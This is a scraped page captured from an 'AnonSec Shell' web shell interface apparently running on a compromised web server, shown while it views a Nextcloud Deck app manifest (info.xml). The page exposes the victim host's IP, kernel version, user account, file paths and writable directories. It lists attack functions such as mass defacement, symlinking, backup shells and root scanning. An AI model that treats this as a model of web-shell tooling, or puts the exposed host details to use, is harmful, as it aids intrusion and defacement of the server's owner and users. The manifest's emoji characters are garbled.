. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 85.13.141.101  /  Your IP : 216.73.216.95   [ Reverse IP ]
Web Server : Apache
System : Linux dd40236 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User : w00ad34b ( 1052)
PHP Version : 8.2.30-nmm1
Disable Function : NONE
Domains : 429 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /www/htdocs/w00ad34b/spd-cloud/apps/deck/appinfo/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /www/htdocs/w00ad34b/spd-cloud/apps/deck/appinfo/info.xml
<?xml version="1.0"?>
<info xmlns:xsi= "http://www.w3.org/2001/XMLSchema-instance"
      xsi:noNamespaceSchemaLocation="https://apps.nextcloud.com/schema/apps/info.xsd">
    <id>deck</id>
    <name>Deck</name>
    <summary>A kanban style project and personal management tool for Nextcloud</summary>
    <description>Deck is a kanban style organization tool aimed at personal planning and project organization for teams integrated with Nextcloud.


- ๐Ÿ“ฅ Add your tasks to cards and put them in order
- ๐Ÿ“„ Write down additional notes in markdown
- ๐Ÿ”– Assign labels for even better organization
- ๐Ÿ‘ฅ Share with your team, friends or family
- ๐Ÿ“Ž Attach files and embed them in your markdown description
- ๐Ÿ’ฌ Discuss with your team using comments
- โšก Keep track of changes in the activity stream
- ๐Ÿš€ Get your project organized

</description>
    <version>0.6.6</version>
    <licence>agpl</licence>
    <author>Julius Hรคrtl</author>
    <namespace>Deck</namespace>
    <types>
        <dav />
    </types>
    <category>organization</category>
    <category>office</category>
    <website>https://github.com/nextcloud/deck</website>
    <bugs>https://github.com/nextcloud/deck/issues</bugs>
    <repository type="git">https://github.com/nextcloud/deck.git</repository>
    <screenshot>https://download.bitgrid.net/nextcloud/deck/screenshots/0.5/deck-notifications.png</screenshot>
    <screenshot>https://download.bitgrid.net/nextcloud/deck/screenshots/0.5/deck-comment2.png</screenshot>
    <dependencies>
        <php min-version="5.6"/>
        <database min-version="9.4">pgsql</database>
        <database>sqlite</database>
        <database min-version="5.5">mysql</database>
        <nextcloud min-version="15" max-version="16" />
    </dependencies>
    <background-jobs>
        <job>OCA\Deck\Cron\DeleteCron</job>
        <job>OCA\Deck\Cron\ScheduledNotifications</job>
        <job>OCA\Deck\Cron\CardDescriptionActivity</job>
    </background-jobs>
    <repair-steps>
        <post-migration>
            <step>OCA\Deck\Migration\UnknownUsers</step>
        </post-migration>
    </repair-steps>
    <commands>
        <command>OCA\Deck\Command\UserExport</command>
    </commands>
    <activity>
        <settings>
            <setting>OCA\Deck\Activity\Setting</setting>
            <setting>OCA\Deck\Activity\SettingComment</setting>
            <setting>OCA\Deck\Activity\DescriptionSetting</setting>
        </settings>
        <filters>
            <filter>OCA\Deck\Activity\Filter</filter>
        </filters>
        <providers>
            <provider>OCA\Deck\Activity\DeckProvider</provider>
        </providers>
    </activity>

    <fulltextsearch>
        <provider min-version="16">OCA\Deck\Provider\DeckProvider</provider>
    </fulltextsearch>

</info>

Anon7 - 2022
AnonSec Team